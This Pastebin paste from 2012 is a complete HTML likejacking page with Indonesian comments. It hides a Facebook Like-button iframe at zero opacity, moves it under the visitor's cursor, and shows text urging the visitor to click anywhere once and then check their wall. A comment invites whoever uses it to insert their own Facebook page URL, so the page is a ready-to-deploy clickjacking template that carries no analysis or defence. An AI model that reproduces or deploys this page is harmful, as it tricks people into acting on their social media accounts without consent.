Advertisement
rhiby

bom facebook

Mar 24th, 2012
163
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.27 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5. <title>Facebook</title>
  6.  
  7. <script src="http://xcrew.bagi.us/vba/jquery-1.7.js" type="text/javascript"></script>
  8. <script type="text/javascript">
  9. var interval;
  10. $(function()
  11. {
  12. interval=setInterval("updateActiveElement();", 50);
  13. });
  14.  
  15. function updateActiveElement()
  16. {
  17. if ( $(document.activeElement).attr('id')=="fbframe" )
  18. {
  19. clearInterval(interval);
  20. iflag=1;
  21. }
  22. }
  23.  
  24. </script>
  25. </head>
  26.  
  27. <body>
  28.  
  29. <!--isi situs disini-->
  30.  
  31. <center>
  32. <h2> klik dimana aja 1 x lalu cek di wall ente</h2><br>
  33. <img src="http://xcrew.bagi.us/vba/vba.png">
  34. </center>
  35.  
  36. <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
  37.  
  38.  
  39. <!--ganti dengan url page facebook anda ,dibwh-->
  40.  
  41. <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/pages/TheHosterNET/278263278873053&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
  42.  
  43.  
  44.  
  45. </div>
  46.  
  47.  
  48. <script>
  49. var iflag = 0;
  50. var icontainer = document.getElementById('icontainer');
  51. var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
  52.  
  53.  
  54.  
  55. function mouseFollower(e){
  56.  
  57. if (window.event)
  58. { // for IE
  59. icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
  60. icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
  61. }
  62. else
  63. {
  64. icontainer.style.top = (e.pageY-5)+'px';
  65. icontainer.style.left = (e.pageX-5)+'px';
  66. }
  67.  
  68. }
  69. document.onmousemove = function(e) {
  70. if (iflag == 0) {mouseFollower(e);}
  71. }
  72.  
  73. </script>
  74.  
  75. </body>
  76. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement